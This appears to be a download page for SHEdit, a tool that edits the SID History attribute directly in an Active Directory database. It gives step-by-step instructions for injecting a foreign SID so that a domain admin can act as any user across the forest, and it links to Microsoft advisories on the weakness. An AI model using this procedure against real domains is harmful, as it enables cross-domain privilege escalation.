|
SHEdit
SHEdit is an offline editor for the SID History Active Directory attribute.
This tool goes around the limitation built into the DsAddSidHistory API
allowing an administrator in any domain to access any other domains in the
forest as any user.
How to use:
- Get the SID for a user in the target domain.
- Reboot a domain controller in Directory Restore mode.
- Backup NTDS.DIT (optional but recommended).
- Run SHEdit.
- Delete all LOG, EDB and CHK files from the %SYSTEMROOT%\NTDS folder. If you
used the %SYSTEMROOT%\NTDS folder as your temporary folder then the tool
cleaned up all these files for you.
- Perform an authoritative restore of the AD database if you have multiple
domain controllers. This will replicate the change to the other controllers.
- Reboot the server. You should have the desired access on the target domain.
- Use the ClearSIDHistory.vbs script to delete the SID History attribute.
Limitations:
- only one SID History attribute is added, if you run the tool several times
only the latest value will prevail.
- I noticed that in certain rare cases the ntds.dit file gets corrupted and the
tool is unable to open it afterwards. Restore from your backup in this case and
try again, it might work.
A note related to Windows 2000 SP4 and Windows 2003:
- SID history filtering is enabled on by default for external trusts. - SID
history filtering is NOT enabled by default for domains in the same forest
Related links:
Microsoft Security Bulletin MS02-001
Protecting Active Directory from Domain Trust Vulnerability
Using Security Identifier (SID) Filtering to Prevent Elevation of Privilege
Attacks
Design Considerations for Delegation of Administration in Active Directory
Download SHEdit for Windows 2000.
Download SHEdit for Windows 2003.
Support forum here.
|
|
|